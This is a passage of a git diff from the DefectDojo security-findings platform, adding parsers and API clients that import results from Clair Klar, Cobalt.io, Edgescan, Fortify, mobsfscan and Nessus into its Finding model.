str(self.get_cwe(field)) + vuln['References'] = vuln['References'] + details + # Request and Response pairs + if webinfo in reqrsp: + if webinfo == 'Request': + vuln['Request'] = vuln['Request'] + field + 'SPLITTER' + else: + vuln['Response'] = vuln['Response'] + field + 'SPLITTER' + + dict_index += 1 + + return list(self.create_findings(items, test)) + + def get_cwe(self, vuln_references): + # Match only the first CWE! + vuln_references = vuln_references.split(':')[0] + cweSearch = re.search("CWE-([0-9]*)", vuln_references, re.IGNORECASE) + if cweSearch: + return cweSearch.group(1) + else: + return 0 + + def create_findings(self, items, test): + # Dictonary to hold the aggregated findings with: + # - key: the concatenated aggregate keys + # - value: the finding + dupes = dict() + for details in items: + if details.get('Description') == '': + continue + aggregateKeys = "{}{}{}{}".format(details.get('Title'), details.get('Description'), details.get('CWE'), details.get('Endpoint')) + detail_cwe = None + if details.get('CWE'): + detail_cwe = int(details.get('CWE')) + find = Finding(title=details.get('Title'), + description=details.get('Description'), + test=test, + severity=details.get('Severity'), + mitigation=details.get('Mitigation'), + references=details.get('References'), + impact=details.get('Impact'), + cwe=detail_cwe, + false_p=False, + duplicate=False, + out_of_scope=False, + mitigated=None, + static_finding=False, + dynamic_finding=True, + nb_occurences=1) + + if len(details.get('Request')) > 0: + requests = details.get('Request').split('SPLITTER')[:-1] + responses = details.get('Response').split('SPLITTER')[:-1] + unsaved_req_resp = list() + for index in range(0, len(requests)): + unsaved_req_resp.append({"req": requests[index], "resp": responses[index]}) + find.unsaved_req_resp = unsaved_req_resp + + find.unsaved_endpoints = list() + dupes[aggregateKeys] = find + + for url in details.get('Endpoint'): + find.unsaved_endpoints.append(Endpoint.from_uri(url)) + + return list(dupes.values()) diff --git a/dojo/tools/clair_klar/__init__.py b/dojo/tools/clair_klar/__init__.py new file mode 100644 index 00000000000..e69de29bb2d diff --git a/dojo/tools/clair_klar/parser.py b/dojo/tools/clair_klar/parser.py new file mode 100644 index 00000000000..c647cd933a7 --- /dev/null +++ b/dojo/tools/clair_klar/parser.py @@ -0,0 +1,109 @@ +import json +import logging + +from dojo.models import Finding + +logger = logging.getLogger(__name__) + + +class ClairKlarParser(object): + + def get_scan_types(self): + return ["Clair Klar Scan"] + + def get_label_for_scan_types(self, scan_type): + return scan_type # no custom label for now + + def get_description_for_scan_types(self, scan_type): + return "Import JSON reports of Docker image vulnerabilities from clair klar client." + + def get_findings(self, json_output, test): + + tree = self.parse_json(json_output) + + items = list() + clair_severities = ["Unknown", "Negligible", "Low", "Medium", "High", "Critical", "Defcon1"] + if tree: + for clair_severity in clair_severities: + items.extend(self.set_items_for_severity(tree, test, clair_severity)) + return items + + def parse_json(self, json_output): + try: + data = json_output.read() + try: + tree = json.loads(str(data, 'utf-8')) + except: + tree = json.loads(data) + subtree = tree.get('Vulnerabilities') + except: + raise Exception("Invalid format") + + return subtree + + def set_items_for_severity(self, tree, test, severity): + items = list() + tree_severity = tree.get(severity) + if tree_severity: + for data in self.get_items(tree_severity, test): + items.append(data) + logger.debug("Appended findings for severity " + severity) + else: + logger.debug("No findings for severity " + severity) + return items + + def get_items(self, tree_severity, test): + items = {} + + for node in tree_severity: + item = get_item(node, test) + unique_key = str(node['Name']) + str(node['FeatureName']) + items[unique_key] = item + + return items.values() + + +def get_item(item_node, test): + if item_node['Severity'] == 'Negligible': + severity = 'Info' + elif item_node['Severity'] == 'Unknown': + severity = 'Critical' + elif item_node['Severity'] == 'Defcon1': + severity = 'Critical' + else: + severity = item_node['Severity'] + description = "" + if "Description" in item_node: + description += item_node['Description'] + "\n
    " + if "FeatureName" in item_node: + description += "Vulnerable feature: " + item_node['FeatureName'] + "\n
    " + if "FeatureVersion" in item_node: + description += " Vulnerable Versions: " + str(item_node['FeatureVersion']) + + mitigation = "" + if 'FixedBy' in item_node: + description = description + "\n Fixed by: " + str(item_node['FixedBy']) + mitigation = "Please use version " + item_node['FixedBy'] + " of library " + item_node['FeatureName'] + else: + mitigation = "A patch could not been found" + + link = "" + if 'Link' in item_node: + link = item_node['Link'] + + finding = Finding(title=item_node['Name'] + " - " + "(" + item_node['FeatureName'] + ", " + item_node['FeatureVersion'] + ")", + test=test, + severity=severity, + description=description, + mitigation=mitigation, + references=link, + false_p=False, + duplicate=False, + out_of_scope=False, + mitigated=None, + cwe=1035, # Vulnerable Third Party Component + static_finding=True, + dynamic_finding=False, + impact="No impact provided") + + return finding diff --git a/dojo/tools/cobalt_api/__init__.py b/dojo/tools/cobalt_api/__init__.py new file mode 100644 index 00000000000..e69de29bb2d diff --git a/dojo/tools/cobalt_api/api_client.py b/dojo/tools/cobalt_api/api_client.py new file mode 100644 index 00000000000..30f962911dc --- /dev/null +++ b/dojo/tools/cobalt_api/api_client.py @@ -0,0 +1,106 @@ +import requests + + +class CobaltAPI: + """ + A simple client for the Cobalt.io API + """ + + cobalt_api_url = "https://api.cobalt.io" + + def __init__(self, tool_config): + self.session = requests.Session() + if tool_config.authentication_type == "API": + self.api_token = tool_config.api_key + self.org_token = tool_config.extras + else: + raise Exception('Cobalt.io Authentication type {} not supported'.format(tool_config.authentication_type)) + + def get_asset(self, asset_id): + """ + Returns an asset + :param asset_id: + :return: + """ + assets = self.get_assets() + + for asset in assets: + if asset["resource"]["id"] == asset_id: + return asset + + raise Exception("Asset {} not found in organisation".format(asset_id)) + + def get_assets(self): + """Returns all org assets""" + response = self.session.get( + url='{}/assets'.format(self.cobalt_api_url), + headers=self.get_headers(), + ) + + if response.ok: + return response.json().get('data') + else: + raise Exception("Unable to get assets due to {} - {}".format( + response.status_code, response.content.decode("utf-8") + )) + + def get_findings(self, asset_id): + """ + Returns the findings for an asset + :param asset_id: + :return: + """ + response = self.session.get( + url='{}/findings?asset={}'.format(self.cobalt_api_url, asset_id), + headers=self.get_headers(), + ) + + if response.ok: + return response.json() + else: + raise Exception("Unable to get asset findings due to {} - {}".format( + response.status_code, response.content.decode("utf-8") + )) + + def test_connection(self): + # Request orgs for the org name + response_orgs = self.session.get( + url='{}/orgs'.format(self.cobalt_api_url), + headers=self.get_headers(), + ) + + # Request assets to validate the org token + response_assets = self.session.get( + url='{}/assets'.format(self.cobalt_api_url), + headers=self.get_headers(), + ) + + if response_orgs.ok and response_assets.ok: + data = response_orgs.json().get('data') + orgs = filter(lambda org: org["resource"]["token"] == self.org_token, data) + org = list(orgs)[0] + org_name = org["resource"]["name"] + return f'You have access to the "{org_name}" organization' + else: + raise Exception("Connection failed (error: {} - {})".format( + response_assets.status_code, response_assets.content.decode("utf-8") + )) + + def test_product_connection(self, api_scan_configuration): + asset = self.get_asset(api_scan_configuration.service_key_1) + asset_name = asset['resource']['title'] + api_scan_configuration.service_key_2 = asset_name + api_scan_configuration.save() + return f'You have access to asset "{asset_name}"' + + def get_headers(self): + headers = { + 'accept': 'application/vnd.cobalt.v1+json', + 'Authorization': 'Bearer {}'.format(self.api_token), + 'User-Agent': 'DefectDojo', + } + + if self.org_token is not None: + headers['X-Org-Token'] = self.org_token + + return headers diff --git a/dojo/tools/cobalt_api/importer.py b/dojo/tools/cobalt_api/importer.py new file mode 100644 index 00000000000..f2b3dbd0f14 --- /dev/null +++ b/dojo/tools/cobalt_api/importer.py @@ -0,0 +1,40 @@ +import logging +from django.core.exceptions import ValidationError +from dojo.models import Product_API_Scan_Configuration +from dojo.tools.cobalt_api.api_client import CobaltAPI + +logger = logging.getLogger(__name__) + + +class CobaltApiImporter(object): + """ + Import from Cobalt.io API + """ + + def get_findings(self, test): + client, config = self.prepare_client(test) + findings = client.get_findings(config.service_key_1) + return findings + + def prepare_client(self, test): + product = test.engagement.product + if test.api_scan_configuration: + config = test.api_scan_configuration + # Double check of config + if config.product != product: + raise ValidationError('API Scan Configuration for Cobalt.io and Product do not match.') + else: + configs = Product_API_Scan_Configuration.objects.filter(product=product, tool_configuration__tool_type__name='Cobalt.io') + if configs.count() == 1: + config = configs.first() + elif configs.count() > 1: + raise ValidationError( + 'More than one Product API Scan Configuration has been configured, but none of them has been chosen. Please specify at Test which one should be used.' + ) + else: + raise ValidationError( + 'There are no API Scan Configurations for this Product. Please add at least one API Scan Configuration for Cobalt.io to this Product.' + ) + + tool_config = config.tool_configuration + return CobaltAPI(tool_config), config diff --git a/dojo/tools/cobalt_api/parser.py b/dojo/tools/cobalt_api/parser.py new file mode 100644 index 00000000000..e3ed0fc17f5 --- /dev/null +++ b/dojo/tools/cobalt_api/parser.py @@ -0,0 +1,172 @@ +import json +import textwrap +from datetime import datetime +from dojo.models import Endpoint, Finding +from dojo.tools.cobalt_api.importer import CobaltApiImporter + + +SCAN_COBALTIO_API = 'Cobalt.io API Import' + + +class CobaltApiParser(object): + """ + Import from Cobalt.io API /findings + """ + + def get_scan_types(self): + return [SCAN_COBALTIO_API] + + def get_label_for_scan_types(self, scan_type): + return SCAN_COBALTIO_API + + def get_description_for_scan_types(self, scan_type): + return "Cobalt.io findings can be directly imported using the Cobalt.io API. An API Scan Configuration has to be setup in the Product." + + def requires_file(self, scan_type): + return False + + def requires_tool_type(self, scan_type): + return 'Cobalt.io' + + def get_findings(self, file, test): + if file is None: + data = CobaltApiImporter().get_findings(test) + else: + data = json.load(file) + + findings = [] + for entry in data["data"]: + resource = entry["resource"] + links = entry["links"] + if not self.include_finding(resource): + continue + + cobalt_state = resource["state"] + cobalt_severity = resource["severity"] + cobalt_log = resource["log"] + + title = resource["title"] + date = self.get_created_date(cobalt_log) + description = "\n".join( + [ + resource["description"], + "", + "Cobalt.io details:", + f"- Impact: {resource['impact']}", + f"- Likelihood: {resource['likelihood']}", + "", + "Cobalt.io link:", + links["ui"]["url"], + ] + ) + mitigation = resource["suggested_fix"] + steps_to_reproduce = resource["proof_of_concept"] + endpoints = resource["affected_targets"] + last_status_update = self.get_latest_update_date(cobalt_log) + unique_id_from_tool = resource["id"] + + finding = Finding( + test=test, + title=textwrap.shorten(title, width=511, placeholder="..."), + date=date, + severity=self.convert_severity(cobalt_severity), + description=description, + mitigation=mitigation, + steps_to_reproduce=steps_to_reproduce, + active=self.is_active(cobalt_state), + verified=self.is_verified(cobalt_state), + false_p=self.is_false_p(cobalt_state), + duplicate=self.is_duplicate(cobalt_state), + out_of_scope=self.is_out_of_scope(cobalt_state), + risk_accepted=self.is_risk_accepted(cobalt_state), + is_mitigated=self.is_mitigated(cobalt_state), + last_status_update=last_status_update, + static_finding=False, + dynamic_finding=True, + unique_id_from_tool=unique_id_from_tool) + finding.unsaved_endpoints = self.convert_endpoints(endpoints) + + findings.append(finding) + + return findings + + def get_created_date(self, log): + """Get the date of when a finding was created""" + for entry in log: + if entry["action"] == "created": + return self.convert_log_timestamp(entry["timestamp"]) + + return None + + def get_latest_update_date(self, log): + """Get the date of the last time a finding was updated""" + last_index = len(log) - 1 + entry = log[last_index] + return self.convert_log_timestamp(entry["timestamp"]) + + def include_finding(self, resource): + """Determine whether this finding should be imported to DefectDojo""" + allowed_states = [ + "carried_over", # Finding from a previous pentest + "check_fix", # Fix for finding is being verified + "duplicate", # Finding is a duplicate within the pentest + "invalid", # Finding is found to be a false positive + "need_fix", # Finding is verified and valid + "new", # The finding is not yet verified by the pentest team + "out_of_scope", # Finding is out of the scope of the pentest + "triaging", # The finding is not yet verified by the pentest team + "valid_fix", # Fix for finding has been varified + "wont_fix", # Risk of finding has been accepted + ] + + if resource["state"] in allowed_states: + return True + else: + return False + + def convert_endpoints(self, affected_targets): + """Convert Cobalt affected_targets into DefectDojo endpoints""" + endpoints = [] + for affected_target in affected_targets: + endpoint = Endpoint.from_uri(affected_target) + endpoints.append(endpoint) + return endpoints + + def convert_log_timestamp(self, timestamp): + """Convert a log entry's timestamp to a DefectDojo date""" + date_obj = datetime.strptime(timestamp, "%Y-%m-%dT%H:%M:%S.%fZ") + return date_obj.strftime("%Y-%m-%d") + + def convert_severity(self, cobalt_severity): + """Convert severity value""" + if cobalt_severity == "low": + return "Low" + elif cobalt_severity == "medium": + return "Medium" + elif cobalt_severity == "high": + return "High" + else: + return "Info" + + def is_active(self, cobalt_state): + return not self.is_mitigated(cobalt_state) \ + and not self.is_false_p(cobalt_state) \ + and not self.is_out_of_scope(cobalt_state) + + def is_duplicate(self, cobalt_state): + return cobalt_state == "duplicate" + + def is_false_p(self, cobalt_state): + return cobalt_state == "invalid" + + def is_mitigated(self, cobalt_state): + return cobalt_state == "valid_fix" + + def is_out_of_scope(self, cobalt_state): + return cobalt_state == "out_of_scope" + + def is_risk_accepted(self, cobalt_state): + return cobalt_state == "wont_fix" + + def is_verified(self, cobalt_state): + return cobalt_state != "new" and cobalt_state != "triaging" diff --git a/dojo/tools/crashtest_security/parser.py b/dojo/tools/crashtest_security/parser.py old mode 100644 new mode 100755 diff --git a/dojo/tools/edgescan/__init__.py b/dojo/tools/edgescan/__init__.py new file mode 100644 index 00000000000..e69de29bb2d diff --git a/dojo/tools/edgescan/api_client.py b/dojo/tools/edgescan/api_client.py new file mode 100644 index 00000000000..6f7315580b2 --- /dev/null +++ b/dojo/tools/edgescan/api_client.py @@ -0,0 +1,73 @@ +import requests +import json +from json.decoder import JSONDecodeError + +from dojo.models import Tool_Configuration, Tool_Type + + +class EdgescanAPI(object): + """ + A simple client for the Edgescan API + """ + + DEFAULT_URL = "https://live.edgescan.com" + + def __init__(self, tool_config=None): + tool_type, _ = Tool_Type.objects.get_or_create(name='Edgescan') + + if not tool_config: + try: + tool_config = Tool_Configuration.objects.get(tool_type=tool_type) + except Tool_Configuration.DoesNotExist: + raise Exception( + 'No Edgescan tool is configured. \n' + 'Create a new Tool at Settings -> Tool Configuration' + ) + except Tool_Configuration.MultipleObjectsReturned: + raise Exception( + 'More than one Tool Configuration for Edgescan exists. \n' + 'Please specify at Product configuration which one should be used.' + ) + + if tool_config.authentication_type == "API": + self.api_key = tool_config.api_key + self.url = tool_config.url or self.DEFAULT_URL + self.options = self.get_extra_options(tool_config) + else: + raise Exception('Edgescan Authentication type {} not supported'.format(tool_config.authentication_type)) + + @staticmethod + def get_extra_options(tool_config): + if tool_config.extras: + try: + return json.loads(tool_config.extras) + except (JSONDecodeError, TypeError): + raise ValueError('JSON not provided in Extras field.') + + def get_findings(self, asset_id): + url = f"{self.url}/api/v1/vulnerabilities/export.json?c[asset_id]={asset_id}&c[status]=open" + if 'date' in self.options: + url += f"&c[date_opened_after]={self.options['date']}" + + response = requests.get( + url=url, + headers=self.get_headers(), + proxies=self.get_proxies(), + ) + response.raise_for_status() + return response.json() + + def get_headers(self): + headers = { + "X-API-TOKEN": self.api_key, + "Content-Type": "application/json", + "User-Agent": "DefectDojo", + } + + return headers + + def get_proxies(self): + if "proxy" not in self.options: + return None + + return {"https": self.options["proxy"]} diff --git a/dojo/tools/edgescan/importer.py b/dojo/tools/edgescan/importer.py new file mode 100644 index 00000000000..a47a00e7d3c --- /dev/null +++ b/dojo/tools/edgescan/importer.py @@ -0,0 +1,37 @@ +from dojo.models import Product_API_Scan_Configuration +from dojo.tools.edgescan.api_client import EdgescanAPI + + +class EdgescanImporter(object): + """ + Import from Edgescan API + """ + + def get_findings(self, test): + client, config = self.prepare_client(test) + findings = client.get_findings(config.service_key_1) + return findings + + def prepare_client(self, test): + product = test.engagement.product + if test.api_scan_configuration: + config = test.api_scan_configuration + if config.product != product: + raise Exception('API Scan Configuration for Edgescan and Product do not match.') + else: + configs = Product_API_Scan_Configuration.objects.filter(product=product) + if configs.count() == 1: + config = configs.first() + elif configs.count() > 1: + raise Exception( + 'More than one Product API Scan Configuration has been configured, but none of them has been chosen.\n' + 'Please specify at Test which one should be used.' + ) + else: + raise Exception( + 'There are no API Scan Configurations for this Product.\n' + 'Please add at least one API Scan Configuration for Edgescan to this Product.' + ) + + tool_config = config.tool_configuration + return EdgescanAPI(tool_config), config diff --git a/dojo/tools/edgescan/parser.py b/dojo/tools/edgescan/parser.py new file mode 100644 index 00000000000..233685186e2 --- /dev/null +++ b/dojo/tools/edgescan/parser.py @@ -0,0 +1,65 @@ +import json + +from dojo.models import Endpoint, Finding +from dojo.tools.edgescan.importer import EdgescanImporter + +ES_SEVERITIES = {1: "Info", 2: "Low", 3: "Medium", 4: "High", 5: "Critical"} +SCANTYPE_EDGESCAN = 'Edgescan Scan' + + +class EdgescanParser(object): + """ + Import from Edgescan API or JSON file + """ + + def get_scan_types(self): + return [SCANTYPE_EDGESCAN] + + def get_label_for_scan_types(self, scan_type): + return scan_type + + def get_description_for_scan_types(self, scan_type): + return "Edgescan findings can be imported by API or JSON file." + + def requires_tool_type(self, scan_type): + return "Edgescan" + + def get_findings(self, file, test): + if file: + data = json.load(file) + else: + data = EdgescanImporter().get_findings(test) + + return self.process_vulnerabilities(test, data) + + def process_vulnerabilities(self, test, vulnerabilities): + findings = [] + + for vulnerability in vulnerabilities: + findings.append(self.make_finding(test, vulnerability)) + + return findings + + def make_finding(self, test, vulnerability): + finding = Finding(test=test) + finding.title = vulnerability["name"] + finding.date = vulnerability["date_opened"][:10] + if vulnerability["cwes"]: + finding.cwe = int(vulnerability["cwes"][0][4:]) + if vulnerability["cves"]: + finding.unsaved_vulnerability_ids = vulnerability["cves"] + if vulnerability["cvss_version"] == 3: + if vulnerability["cvss_vector"]: + finding.cvssv3 = vulnerability["cvss_vector"] + finding.url = vulnerability["location"] + finding.severity = ES_SEVERITIES[vulnerability["severity"]] + finding.description = vulnerability["description"] + finding.mitigation = vulnerability["remediation"] + finding.active = True if vulnerability["status"] == "open" else False + if vulnerability["asset_tags"]: + finding.tags = vulnerability["asset_tags"].split(",") + finding.unique_id_from_tool = vulnerability["id"] + + finding.unsaved_endpoints = [Endpoint.from_uri(vulnerability["location"])] + + return finding diff --git a/dojo/tools/fortify/DefaultReportDefinitionAllIssues.xml b/dojo/tools/fortify/DefaultReportDefinitionAllIssues.xml new file mode 100755 index 00000000000..c9f3657ad46 --- /dev/null +++ b/dojo/tools/fortify/DefaultReportDefinitionAllIssues.xml @@ -0,0 +1,184 @@ + + + Fortify Security Report + + /MF_logo.jpg + Copyright 2018 Micro Focus or one of its affiliates. + + Executive Summary + + Issues Overview + This section provides an overview of the issues uncovered during analysis. The report covers a summary of vulnerability categories discovered by the tool. The auditor should augment this section with higher-level conclusions derived from human review of the application (including architecture reviews, black-box testing, compliance issues, etc.) + On $SCAN_DATE$, a source code review was performed over the $PROJECT_NAME$ code base. $SCAN_SUMMARY$ were scanned and reviewed for defects that could lead to potential security vulnerabilities. A total of $TOTAL_FINDINGS$ reviewed findings were uncovered during the analysis. + + + Issue Summary by Fortify Priority Order + A table summarizing the number of issues found and the breakdown of issues in each Fortify Priority Level + + + + Fortify Priority Order + + + + + Recommendations and Conclusions + This section gives some high-level recommendations on remediating the issues discussed in the Issues Summary sub section. Recommendations will vary based on deployment scenarios, risk appetite, and existing mitigating strategies. The auditor should supplement the Fortify generic recommendations with specific information that takes into account the application specific variables. + The Issues Category section provides Fortify recommendations for addressing issues at a generic level. The recommendations for specific fixes can be extrapolated from those generic recommendations by the development group. + + + + + Project Summary + + Code Base Summary + Summary of the Codebase that was analyzed + Code location: $SOURCE_BASE_PATH$ +Number of Files: $NUMBER_OF_FILES$ +Lines of Code: $LOC$ +Build Label: $PROJECT_BUILD_LABEL$ + + + Scan Information + Details of the analysis + Scan time: $SCAN_TIME$ +SCA Engine version: $FORTIFY_SCA_VERSION$ +Machine Name: $SCAN_COMPUTER_ID$ +Username running scan: $SCAN_USER$ + + + Results Certification + A full summary of the Results Certification for this project + $RESULTS_CERTIFICATION_SUMMARY$ + +Details: + +$RESULTS_CERTIFICATION$ + + + Attack Surface + A full summary of the attack surface for this project + Attack Surface: +$ATTACK_SURFACE$ + + + Filter Set Summary + A brief summary of the filterset used to create this report + Current Enabled Filter Set: +$FILTERSET_NAME$ + +Filter Set Details: + +$FILTERSET_DETAILS$ + + + Audit Guide Summary + Summary of the impact of the audit guide + $AUDIT_GUIDE_SUMMARY$ + + + + + Results Outline + + Overall number of results + Results count + The scan found $TOTAL_FINDINGS$ issues. + + + Vulnerability Examples by Category + Results summary for critical and high priority issues. Vulnerability examples are provided by category. + + + + Category + + + + + + Detailed Project Summary + + Files Scanned + A detailed listing of all scanned files. Files are listed with paths relative to the Source Base Path + Code base location: $SOURCE_BASE_PATH$ +Files Scanned: +$FILE_LISTING$ + + + Reference Elements + A Listing of all libraries used for the translation phase of the analysis + Classpath: + +$CLASSPATH_LISTING$ + +Libdirs: + +$LIBDIR_LISTING$ + + + Rulepacks + A listing of all rulepacks used in the analysis + $RULEPACKS$ + + + Properties + A complete listing of all properties set during analysis phase + $PROPERTIES$ + + + Commandline Arguments + A listing of all arguments passed to SCA during the analysis phase + $COMMANDLINE_ARGS$ + + + Warnings + A listing of all warnings that occurred during the scan, during both translation and analysis phase + $WARNINGS$ + + + + + Issue Count by Category + + Issues By Category + + + + Category + + + + + + Issue Breakdown by Analysis + + Issue by Analysis + + + + Analysis + + + + + + + + New Issues + + + New Issues + A list of issues discovered since the previous analysis. + The following issues have been discovered since the last scan. + + + + New Issue + + + + + + + diff --git a/dojo/tools/fortify/README.md b/dojo/tools/fortify/README.md new file mode 100644 index 00000000000..c89e306c05c --- /dev/null +++ b/dojo/tools/fortify/README.md @@ -0,0 +1,17 @@ +# Usage +To use this importer you will need an XML generated from a Fortify FPR. This guide assumes you +already have, or know how to acquire, an FPR file. Once you have the FPR file you will need +use Fortify's ReportGenerator tool (located in the bin directory of your fortify install). +```FORTIFY_INSTALL_ROOT/bin/ReportGenerator``` + +### Getting All Issues +By default, the Report Generator tool does _not_ display all issues, it will only display one +per category. To get all issues, copy the DefaultReportDefinitionAllIssues.xml file from this +directory to: +```FORTIFY_INSTALL_ROOT/Core/config/reports``` + +Once this is complete, you can run the following command on your .fpr file to generate the +required XML: +``` +./path/to/ReportGenerator -format xml -f /path/to/output.xml -source /path/to/downloaded/artifact.fpr -template DefaultReportDefinitionAllIssues.xml +``` diff --git a/dojo/tools/gosec/__init__.py b/dojo/tools/gosec/__init__.py old mode 100644 new mode 100755 diff --git a/dojo/tools/mobsfscan/__init__.py b/dojo/tools/mobsfscan/__init__.py new file mode 100644 index 00000000000..e69de29bb2d diff --git a/dojo/tools/mobsfscan/parser.py b/dojo/tools/mobsfscan/parser.py new file mode 100644 index 00000000000..942b961ee13 --- /dev/null +++ b/dojo/tools/mobsfscan/parser.py @@ -0,0 +1,74 @@ +import json +import hashlib +import re +from dojo.models import Finding + + +class MobsfscanParser(object): + """ + A class that can be used to parse the mobsfscan (https://github.com/MobSF/mobsfscan) JSON report file. + """ + + SEVERITY = { + "ERROR": "High", + "WARNING": "Medium", + "INFO": "Low", + } + + def get_scan_types(self): + return ["Mobsfscan Scan"] + + def get_label_for_scan_types(self, scan_type): + return "Mobsfscan Scan" + + def get_description_for_scan_types(self, scan_type): + return "Import JSON report for mobsfscan report file." + + def get_findings(self, filename, test): + data = json.load(filename) + if len(data.get('results')) == 0: + return [] + else: + dupes = {} + for key, item in data.get('results').items(): + metadata = item.get('metadata') + cwe = int(re.match(r'CWE-([0-9]+)', metadata.get('cwe')).group(1)) + masvs = metadata.get('masvs') + owasp_mobile = metadata.get('owasp-mobile') + description = "\n".join([ + f"**Description:** `{metadata.get('description')}`", + f"**OWASP MASVS:** `{masvs}`", + f"**OWASP Mobile:** `{owasp_mobile}`", + ]) + references = metadata.get('reference') + if metadata.get('severity') in self.SEVERITY: + severity = self.SEVERITY[metadata.get('severity')] + else: + severity = "Info" + + finding = Finding( + title=f"{key}", + test=test, + severity=severity, + nb_occurences=1, + cwe=cwe, + description=description, + references=references, + ) + if item.get('files'): + for file in item.get('files'): + file_path = file.get('file_path') + line = file.get('match_lines')[0] + finding.file_path = file_path + finding.line = line + + dupe_key = hashlib.sha256( + (key + str(cwe) + masvs + owasp_mobile).encode('utf-8') + ).hexdigest() + + if dupe_key in dupes: + finding = dupes[dupe_key] + finding.nb_occurences += 1 + else: + dupes[dupe_key] = finding + return list(dupes.values()) diff --git a/dojo/tools/nessus/parser.py b/dojo/tools/nessus/parser.py new file mode 100644 index 00000000000..ad4b983384b --- /dev/null +++ b/dojo/tools/nessus/parser.py @@ -0,0 +1,268 @@ +import csv +import io +import logging +import re +import sys +from xml.dom import NamespaceErr + +from cpe import CPE +from cvss import CVSS3 +from defusedxml import ElementTree +from hyperlink._url import SCHEME_PORT_MAP + +from dojo.models import Endpoint, Finding, Test + +LOGGER = logging.getLogger(__name__) + + +class NessusCSVParser(object): + + def _convert_severity(self, val): + if "None" == val: + return 'Info' + if val is None: + return 'Info' + else: + return val.title() + + def _format_cve(self, val): + if val is None: + return None + elif "" == val: + return None + cve_match = re.findall(r"CVE-[0-9]+-[0-9]+", val.upper(), re.IGNORECASE) + if cve_match: + return cve_match + return None + + def _format_cpe(self, val): + if val is None: + return None + elif "" == val: + return None + cpe_match = re.findall(r"cpe:/[^\n\ ]+", val) + if cpe_match: + return cpe_match + return None + + def get_findings(self, filename, test: Test): + content = filename.read() + if type(content) is bytes: + content = content.decode('utf-8') + csv.field_size_limit(int(sys.maxsize / 10)) # the request/resp are big + reader = csv.DictReader(io.StringIO(content)) + dupes = dict() + for row in reader: + # manage severity from two possible columns 'Severity' and 'Risk' + severity = 'Info' + if 'Severity' in row: + severity = self._convert_severity(row.get('Severity')) + elif 'Risk' in row: + severity = self._convert_severity(row.get('Risk')) + # manage title from two possible columns 'Nme' and 'Plugin Name' + title = row.get('Name') + if title is None and 'Plugin Name' in row: + title = row.get('Plugin Name') + # special case to skip empty titles + if not title: + continue + description = row.get('Synopsis') + mitigation = str(row.get('Solution')) + impact = row.get('Description', 'N/A') + references = row.get('See Also', 'N/A') + + dupe_key = severity + title + row.get('Host', 'No host') + str(row.get('Port', 'No port')) + row.get('Synopsis', 'No synopsis') + + detected_cve = self._format_cve(str(row.get('CVE'))) + + if dupe_key in dupes: + find = dupes[dupe_key] + if 'Plugin Output' in row: + find.description += row.get('Plugin Output') + else: + if 'Plugin Output' in row: + description = description + str(row.get('Plugin Output')) + find = Finding(title=title, + test=test, + description=description, + severity=severity, + mitigation=mitigation, + impact=impact, + references=references) + if detected_cve: + find.unsaved_vulnerability_ids = detected_cve + + # manage CVSS vector (only v3.x for now) + if 'CVSS V3 Vector' in row and '' != row.get('CVSS V3 Vector'): + find.cvssv3 = CVSS3('CVSS:3.0/' + str(row.get('CVSS V3 Vector'))).clean_vector(output_prefix=False) + # manage CPE data + detected_cpe = self._format_cpe(str(row.get('CPE'))) + if detected_cpe: + # FIXME support more than one CPE in Nessus CSV parser + if len(detected_cpe) > 1: + LOGGER.debug("more than one CPE for a finding. NOT supported by Nessus CSV parser") + cpe_decoded = CPE(detected_cpe[0]) + find.component_name = cpe_decoded.get_product()[0] if len(cpe_decoded.get_product()) > 0 else None + find.component_version = cpe_decoded.get_version()[0] if len(cpe_decoded.get_version()) > 0 else None + + find.unsaved_endpoints = list() + dupes[dupe_key] = find + # manage endpoints + host = row.get('Host', row.get('DNS Name')) + if len(host) == 0: + host = row.get('IP Address', 'localhost') + + endpoint = Endpoint( + protocol=row.get('Protocol').lower() if 'Protocol' in row else None, + host=host, + port=row.get('Port') + ) + find.unsaved_endpoints.append(endpoint) + return list(dupes.values()) + + +class NessusXMLParser(object): + def get_findings(self, file, test): + nscan = ElementTree.parse(file) + root = nscan.getroot() + + if 'NessusClientData_v2' not in root.tag: + raise NamespaceErr('This version of Nessus report is not supported. Please make sure the export is ' + 'formatted using the NessusClientData_v2 schema.') + dupes = {} + for report in root.iter("Report"): + for host in report.iter("ReportHost"): + ip = host.attrib['name'] + fqdn = host.find(".//HostProperties/tag[@name='host-fqdn']").text if host.find( + ".//HostProperties/tag[@name='host-fqdn']") is not None else None + + for item in host.iter("ReportItem"): + # if item.attrib["svc_name"] == "general": + # continue + + port = None + if float(item.attrib["port"]) > 0: + port = item.attrib["port"] + + protocol = None + if str(item.attrib["svc_name"]): + protocol = re.sub(r'[^A-Za-z0-9\-\+]+', "", item.attrib["svc_name"]) + if protocol == 'www': + protocol = 'http' + if protocol not in SCHEME_PORT_MAP: + protocol = re.sub(r'[^A-Za-z0-9\-\+]+', "", item.attrib["protocol"]) + + description = "" + plugin_output = None + if item.findtext("synopsis"): + description = item.find("synopsis").text + "\n\n" + if item.findtext("plugin_output"): + plugin_output = "Plugin Output: " + ip + ( + (":" + port) if port is not None else "") + \ + " \n```\n" + item.find("plugin_output").text + \ + "\n```\n\n" + description += plugin_output + + nessus_severity_id = int(item.attrib["severity"]) + severity = self.get_text_severity(nessus_severity_id) + + impact = "" + if item.find("description"): + impact = item.find("description").text + "\n\n" + if item.findtext("cvss_vector"): + impact += "CVSS Vector: " + item.find("cvss_vector").text + "\n" + if item.findtext("cvss_base_score"): + impact += "CVSS Base Score: " + item.find("cvss_base_score").text + "\n" + if item.findtext("cvss_temporal_score"): + impact += "CVSS Temporal Score: " + item.find("cvss_temporal_score").text + "\n" + + mitigation = item.find("solution").text if item.find("solution") is not None else "N/A" + references = "" + for ref in item.iter("see_also"): + refs = ref.text.split() + for r in refs: + references += r + "\n" + + for xref in item.iter("xref"): + references += xref.text + "\n" + + vulnerability_id = None + if item.findtext("cve"): + vulnerability_id = item.find("cve").text + cwe = None + if item.findtext("cwe"): + cwe = item.find("cwe").text + cvssv3 = None + if item.findtext("cvss3_vector"): + cvssv3 = CVSS3(item.findtext("cvss3_vector")).clean_vector() + + title = item.attrib["pluginName"] + dupe_key = severity + title + + if dupe_key in dupes: + find = dupes[dupe_key] + if plugin_output is not None: + find.description += plugin_output + else: + find = Finding(title=title, + test=test, + description=description, + severity=severity, + mitigation=mitigation, + impact=impact, + references=references, + cwe=cwe, + cvssv3=cvssv3) + find.unsaved_vulnerability_ids = list() + find.unsaved_endpoints = list() + dupes[dupe_key] = find + + if vulnerability_id: + 